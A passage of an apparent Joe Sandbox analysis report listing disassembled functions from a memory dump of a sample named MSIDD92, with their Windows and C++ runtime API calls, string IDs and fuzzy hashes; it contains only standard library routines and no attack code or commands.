                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_FreeLocalRegister
                                                                      • String ID:
                                                                      • API String ID: 1378673503-0
                                                                      • Opcode ID: 531cf6e860b93c360f5888be63b2ee222d2b3eeb60411b857ae92cca1e7a619e
                                                                      • Instruction ID: 5e848acc026c854d66a5308c71563d83d021648fffe335c74c89b749df87d544
                                                                      • Opcode Fuzzy Hash: 531cf6e860b93c360f5888be63b2ee222d2b3eeb60411b857ae92cca1e7a619e
                                                                      • Instruction Fuzzy Hash: F451BE71801759DFCB21DF58E841BAEBBF4FB05320F24865AE855A7390E771AA04CBB1
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: __freea$__alloca_probe_16
                                                                      • String ID: a/p$am/pm
                                                                      • API String ID: 3509577899-3206640213
                                                                      • Opcode ID: e93a7f18359107f207b1041c5aa24d6d7955c0ba981b994f98e5d35d553e60ae
                                                                      • Instruction ID: a716f0b067bef7f4994e3bed045388297bdafff58f3fc56eb8b035d8c19ab954
                                                                      • Opcode Fuzzy Hash: e93a7f18359107f207b1041c5aa24d6d7955c0ba981b994f98e5d35d553e60ae
                                                                      • Instruction Fuzzy Hash: FAC1C035900A16DBCF248F68E889BBAB7B0FF07310F284149E945AB659D335DD41CBB1
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,00D9AEEC,00D99710,00D985A3), ref: 00D9AF03
                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D9AF11
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D9AF2A
                                                                      • SetLastError.KERNEL32(00000000,00D9AEEC,00D99710,00D985A3), ref: 00D9AF7C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastValue___vcrt_
                                                                      • String ID:
                                                                      • API String ID: 3852720340-0
                                                                      • Opcode ID: d272943d3484831036691c5dfc0e932f8eb1980258313673c7de02c07081397d
                                                                      • Instruction ID: 6db701fd940a8faabe42c84c3807fda4b907ff54ebc438ba99fa6a41b01d085e
                                                                      • Opcode Fuzzy Hash: d272943d3484831036691c5dfc0e932f8eb1980258313673c7de02c07081397d
                                                                      • Instruction Fuzzy Hash: BC01D47311E321AEAF246FB9EC85A267759DF02BB0724032AF110A21E1FF518D0062F6
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Mpunct$GetvalsH_prolog3
                                                                      • String ID: $+xv
                                                                      • API String ID: 2204710431-1686923651
                                                                      • Opcode ID: aa0127b77343873770cf0f48cf17b3078dde268d8995bce24b71d98758983c4c
                                                                      • Instruction ID: 318a2ac45a0d02fcd636f2b0ecdf1be0719b35704c6ec9c3e654778496851dd7
                                                                      • Opcode Fuzzy Hash: aa0127b77343873770cf0f48cf17b3078dde268d8995bce24b71d98758983c4c
                                                                      • Instruction Fuzzy Hash: 182183B1904B52AED725EF75C45077BBFF8EB09700B04455AE499C7A81D734E601CBB0
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(862265DA,862265DA,?,?,00000000,00DBA221,000000FF), ref: 00D7847B
                                                                        • Part of subcall function 00D97875: EnterCriticalSection.KERNEL32(00DD4AF8,00000000,?,?,00D725B6,00DD571C,862265DA,?,00000000,00DB93ED,000000FF,?,00D71A26), ref: 00D97880
                                                                        • Part of subcall function 00D97875: LeaveCriticalSection.KERNEL32(00DD4AF8,?,?,00D725B6,00DD571C,862265DA,?,00000000,00DB93ED,000000FF,?,00D71A26,?,?,?,862265DA), ref: 00D978BD
                                                                      • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00D78440
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00D78447
                                                                        • Part of subcall function 00D9782B: EnterCriticalSection.KERNEL32(00DD4AF8,?,?,00D72627,00DD571C,00DBCCC0), ref: 00D97835
                                                                        • Part of subcall function 00D9782B: LeaveCriticalSection.KERNEL32(00DD4AF8,?,?,00D72627,00DD571C,00DBCCC0), ref: 00D97868
                                                                        • Part of subcall function 00D9782B: RtlWakeAllConditionVariable.NTDLL ref: 00D978DF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                                      • String ID: IsWow64Process$kernel32
                                                                      • API String ID: 2056477612-3789238822
                                                                      • Opcode ID: be012d9985407ba0c38b47b4caac251691aa4ca77dfd9a77879f64ac28bacb50
                                                                      • Instruction ID: 01732262baf5e5ed746eca140467bf710943b1a4a91f73d00a33b5d134b7eaf1
                                                                      • Opcode Fuzzy Hash: be012d9985407ba0c38b47b4caac251691aa4ca77dfd9a77879f64ac28bacb50
                                                                      • Instruction Fuzzy Hash: F1117F72945B05FFCB10DFA4EC09B9977A8FB08721F24466BE815D3390EBB5A904CA71
                                                                      APIs
                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,862265DA,?,?,00000000,00DBCBE4,000000FF,?,00DA83F1,?,?,00DA83C5,?), ref: 00DA8496
                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00DA84A8
                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00DBCBE4,000000FF,?,00DA83F1,?,?,00DA83C5,?), ref: 00DA84CA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: beec67c277ee74a47fb97f8210655edb406a536b4c57122d04730e6677b2f8b5
                                                                      • Instruction ID: d9aefb4f4fa1734afcdc9c02f4eb6462973ae5a0b4544c24b3b0a4817975871e
                                                                      • Opcode Fuzzy Hash: beec67c277ee74a47fb97f8210655edb406a536b4c57122d04730e6677b2f8b5
                                                                      • Instruction Fuzzy Hash: 0C01A275904726EFCB018F54DC05FAEBBBAFB09B10F044629E811E2390DBB49900CAB0
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D8DDD9
                                                                      • collate.LIBCPMT ref: 00D8DF54
                                                                      • numpunct.LIBCPMT ref: 00D8E1CE
                                                                        • Part of subcall function 00D883C2: __EH_prolog3.LIBCMT ref: 00D883C9
                                                                        • Part of subcall function 00D8815A: __EH_prolog3.LIBCMT ref: 00D88161
                                                                        • Part of subcall function 00D8815A: std::_Lockit::_Lockit.LIBCPMT ref: 00D8816B
                                                                        • Part of subcall function 00D8815A: std::_Lockit::~_Lockit.LIBCPMT ref: 00D881DC
                                                                        • Part of subcall function 00D7EAF0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7EB1D
                                                                        • Part of subcall function 00D7EAF0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7EB40
                                                                        • Part of subcall function 00D7EAF0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7EB68
                                                                        • Part of subcall function 00D7EAF0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7EC07
                                                                        • Part of subcall function 00D84403: Concurrency::cancel_current_task.LIBCPMT ref: 00D844C6
                                                                        • Part of subcall function 00D8764B: __EH_prolog3.LIBCMT ref: 00D87652
                                                                        • Part of subcall function 00D8764B: std::_Lockit::_Lockit.LIBCPMT ref: 00D8765C
                                                                        • Part of subcall function 00D8764B: std::_Lockit::~_Lockit.LIBCPMT ref: 00D876CD
                                                                      • __Getcoll.LIBCPMT ref: 00D8DF94
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                        • Part of subcall function 00D784C0: LocalAlloc.KERNEL32(00000040,00000000,00D9839D,00000000,862265DA,?,00000000,?,00000000,?,00DBCB8D,000000FF,?,00D717D5,00000000,00DBD3BA), ref: 00D784C6
                                                                        • Part of subcall function 00D7B9E0: __Getctype.LIBCPMT ref: 00D7B9EB
                                                                        • Part of subcall function 00D87A5E: __EH_prolog3.LIBCMT ref: 00D87A65
                                                                        • Part of subcall function 00D87A5E: std::_Lockit::_Lockit.LIBCPMT ref: 00D87A6F
                                                                        • Part of subcall function 00D87A5E: std::_Lockit::~_Lockit.LIBCPMT ref: 00D87AE0
                                                                        • Part of subcall function 00D87B88: __EH_prolog3.LIBCMT ref: 00D87B8F
                                                                        • Part of subcall function 00D87B88: std::_Lockit::_Lockit.LIBCPMT ref: 00D87B99
                                                                        • Part of subcall function 00D87B88: std::_Lockit::~_Lockit.LIBCPMT ref: 00D87C0A
                                                                        • Part of subcall function 00D87DDC: __EH_prolog3.LIBCMT ref: 00D87DE3
                                                                        • Part of subcall function 00D87DDC: std::_Lockit::_Lockit.LIBCPMT ref: 00D87DED
                                                                        • Part of subcall function 00D87DDC: std::_Lockit::~_Lockit.LIBCPMT ref: 00D87E5E
                                                                        • Part of subcall function 00D87D47: __EH_prolog3.LIBCMT ref: 00D87D4E
                                                                        • Part of subcall function 00D87D47: std::_Lockit::_Lockit.LIBCPMT ref: 00D87D58
                                                                        • Part of subcall function 00D87D47: std::_Lockit::~_Lockit.LIBCPMT ref: 00D87DC9
                                                                        • Part of subcall function 00D84403: __EH_prolog3.LIBCMT ref: 00D8440A
                                                                        • Part of subcall function 00D84403: std::_Lockit::_Lockit.LIBCPMT ref: 00D84414
                                                                        • Part of subcall function 00D84403: std::_Lockit::~_Lockit.LIBCPMT ref: 00D844BB
                                                                      • codecvt.LIBCPMT ref: 00D8E27F
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtcollatenumpunct
                                                                      • String ID:
                                                                      • API String ID: 2252558201-0
                                                                      • Opcode ID: f67fc3711a3b47d08863c16aea2205a241b202083d75e8aea176bea52deabc6c
                                                                      • Instruction ID: 9ab73bbd30c6fb89e92517df562fc334dc6fcdf314e85c9e145a2c4876c3b46c
                                                                      • Opcode Fuzzy Hash: f67fc3711a3b47d08863c16aea2205a241b202083d75e8aea176bea52deabc6c
                                                                      • Instruction Fuzzy Hash: 34E1C37190021AABDB217F658C066BF7BA5EF41360F14842EF9596B391EF708D109BB1
                                                                      APIs
                                                                      • __alloca_probe_16.LIBCMT ref: 00DAC409
                                                                      • __alloca_probe_16.LIBCMT ref: 00DAC4CA
                                                                      • __freea.LIBCMT ref: 00DAC531
                                                                        • Part of subcall function 00DAB127: HeapAlloc.KERNEL32(00000000,?,?,?,00DAAAAA,?,00000000,?,00D9C282,?,?,?,?,?,?,00D71668), ref: 00DAB159
                                                                      • __freea.LIBCMT ref: 00DAC546
                                                                      • __freea.LIBCMT ref: 00DAC556
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                      • String ID:
                                                                      • API String ID: 1096550386-0
                                                                      • Opcode ID: ac1c2c0b14302f84f18d2e5057c894ee05178bc9d1ea50e30d56ea78a4e413cf
                                                                      • Instruction ID: bd3dede2fa6ff2b23ab80004e2a07241f65bc0833d4ea8a95c8a8872e65a6a27
                                                                      • Opcode Fuzzy Hash: ac1c2c0b14302f84f18d2e5057c894ee05178bc9d1ea50e30d56ea78a4e413cf
                                                                      • Instruction Fuzzy Hash: 2651E772A2020AAFEF215F64CC41EBF36A9EF46360B195529FD08D7241EB75ED1087B0
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7C5BD
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7C5E0
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7C608
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D7C67D
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7C6A7
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                      • String ID:
                                                                      • API String ID: 459529453-0
                                                                      • Opcode ID: 00df825122bb1383a1f9760db7b7a0c3eb6d7154ce184a52025ff8433387ee8d
                                                                      • Instruction ID: f29959b79debb01a4b6572232b54affba34cf29445e2dbf3bda25d5d35d0c44a
                                                                      • Opcode Fuzzy Hash: 00df825122bb1383a1f9760db7b7a0c3eb6d7154ce184a52025ff8433387ee8d
                                                                      • Instruction Fuzzy Hash: 9B41A375811659DFCB11DF58E885BAEBBB4EF04710F18815EE819A73A1E730AE04CBB1
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7EB1D
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7EB40
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7EB68
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D7EBDD
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7EC07
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                      • String ID:
                                                                      • API String ID: 459529453-0
                                                                      • Opcode ID: 0f7064173768dda4efbf2fc7d9e3b80d640944a4f505078ca28066fa96a951d9
                                                                      • Instruction ID: 1061e21420ae59e85b9898b0531109049269da4b3b80d5caf0d772971791f101
                                                                      • Opcode Fuzzy Hash: 0f7064173768dda4efbf2fc7d9e3b80d640944a4f505078ca28066fa96a951d9
                                                                      • Instruction Fuzzy Hash: 7941B371901659DFCB11DF58D840BAEBBB4FB08724F14819AE819A7391E730AE05CBF1
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7EC5D
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7EC80
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7ECA8
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D7ED1D
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7ED47
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                      • String ID:
                                                                      • API String ID: 459529453-0
                                                                      • Opcode ID: af0dfc4b6c50ec1f4e6c6aaf5d60c1c8dc6f0e1ca6a256ad1855f240eccb87c0
                                                                      • Instruction ID: 3a7d6d27a73b121d0a30ff711a92a37b24659660c5114b2b02df18800e9391d5
                                                                      • Opcode Fuzzy Hash: af0dfc4b6c50ec1f4e6c6aaf5d60c1c8dc6f0e1ca6a256ad1855f240eccb87c0
                                                                      • Instruction Fuzzy Hash: 2141C475901659DFCB22DF58D840BAEBBB4FB04724F14829AE815A7391E731AE04CBF1
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7ED9D
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7EDC0
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7EDE8
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D7EE5D
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7EE87
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                      • String ID:
                                                                      • API String ID: 459529453-0
                                                                      • Opcode ID: b25f30f6e7c59ba0febc4d472cb51ec1eda38af8e6bdffa36c9c4bceff30f65a
                                                                      • Instruction ID: 3f450c830a96cc0ccca9f705ef7a5c42a8f2e31464d31bfe50cb8f4d5e8e8f8f
                                                                      • Opcode Fuzzy Hash: b25f30f6e7c59ba0febc4d472cb51ec1eda38af8e6bdffa36c9c4bceff30f65a
                                                                      • Instruction Fuzzy Hash: C241C271800259DFCB11DF58D840BAEBBB4FB08724F15869AE815A7391E730AE44CBF1
                                                                      APIs
                                                                      • GetLastError.KERNEL32(00000010,00000010,?,00D77912,?,?), ref: 00D77C37
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast
                                                                      • String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
                                                                      • API String ID: 1452528299-1782174991
                                                                      • Opcode ID: 5579f6dee9281b5eb21f48f1190eac816442149b16ac1474187305551803745b
                                                                      • Instruction ID: 029de78958cd53a88f43173f5479e00840e2924023eaeee11d9d3540bd0d37ff
                                                                      • Opcode Fuzzy Hash: 5579f6dee9281b5eb21f48f1190eac816442149b16ac1474187305551803745b
                                                                      • Instruction Fuzzy Hash: DA215949A2426286CB741F3C8401735A2F0EF58759F69586FE8CCD7394F76A8CC283A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Maklocstr$Maklocchr
                                                                      • String ID:
                                                                      • API String ID: 2020259771-0
                                                                      • Opcode ID: 05921f46d05f887239f1966408b30294079acb9a308705fe2fe780e3e69fc2b7
                                                                      • Instruction ID: cb11010cf178e20b5680ddb2cfb8b41524422a591d73f45e2e57e7ab3e403592
                                                                      • Opcode Fuzzy Hash: 05921f46d05f887239f1966408b30294079acb9a308705fe2fe780e3e69fc2b7
                                                                      • Instruction Fuzzy Hash: 8C118FB1504744BBE720EBA5D881F12B7ACFF08714F18051AF1858BA41D265FC5087B8
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D8282A
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D82834
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • numpunct.LIBCPMT ref: 00D8286E
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D82885
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D828A5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                      • String ID:
                                                                      • API String ID: 743221004-0
                                                                      • Opcode ID: 41b74cc194ee93e07db8f6041fa1c4d73f43e69cbaec22d870b8c1a6527fd82a
                                                                      • Instruction ID: 00eeb050ab5094688be550994dcfb08e4b8f8ce2fa0accc576fbd7e5e26566ed
                                                                      • Opcode Fuzzy Hash: 41b74cc194ee93e07db8f6041fa1c4d73f43e69cbaec22d870b8c1a6527fd82a
                                                                      • Instruction Fuzzy Hash: 1011CB359002199BCF05FB64D856ABE77B2EF84B20F28410AE411AB391EF709E019BB1
APIs
• __EH_prolog3.LIBCMT ref: 00D88037
• std::_Lockit::_Lockit.LIBCPMT ref: 00D88041
  • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
  • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
• numpunct.LIBCPMT ref: 00D8807B
• std::_Facet_Register.LIBCPMT ref: 00D88092
• std::_Lockit::~_Lockit.LIBCPMT ref: 00D880B2
Memory Dump Source
• Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
• Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
Similarity
